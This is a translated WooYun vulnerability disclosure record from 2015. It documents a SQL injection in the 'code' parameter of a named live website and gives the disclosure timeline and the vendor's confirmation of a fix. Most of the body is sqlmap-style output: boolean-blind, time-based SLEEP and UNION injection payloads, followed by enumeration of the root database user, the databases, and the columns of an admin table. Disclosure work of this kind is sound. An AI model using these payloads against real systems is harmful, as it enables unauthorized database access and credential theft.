WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
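2015-05-06: Details reported to the vendor; awaiting vendor response
2015-05-06: Vendor confirmed; details disclosed only to the vendor
2015-05-16: Details disclosed to core white hats and experts in the relevant field
2015-05-26: Details disclosed to regular white hats
2015-06-05: Details disclosed to intern white hats
2015-06-20: Details disclosed to the public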
233
http://www.daimayi.com/index.php/Apply/get_census?code= root privileges!
Parameter: code (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=') AND 8266=8266 AND ('dsZz'='dsZz

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: code=') AND (SELECT * FROM (SELECT(SLEEP(5)))smIz) AND ('qvdz'='qvdz

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: code=') UNION ALL SELECT NULL,NULL,CONCAT(0x7162716a71,0x454c55726d6641706e4c,0x716b716a71),NULL-- 
---
web server operating system: Windows
web application technology: ASP.NET, PHP 5.5.7
back-end DBMS: MySQL 5.0.12

database management system users [1]:
[*] 'root'@'localhost'

available databases [4]:
[*] huomayi
[*] information_schema
[*] mysql
[*] performance_schema

Table: t_admin
[7 entries]
| id | role_id | sex | status | telphone | password | add_time | true_name | user_name | work_number |
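The passwords have probably already been leaked; remember to change them!!!
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-05-06 16:51
The information has been changed and our technical staff are already fixing the vulnerability. Thank you!
None yet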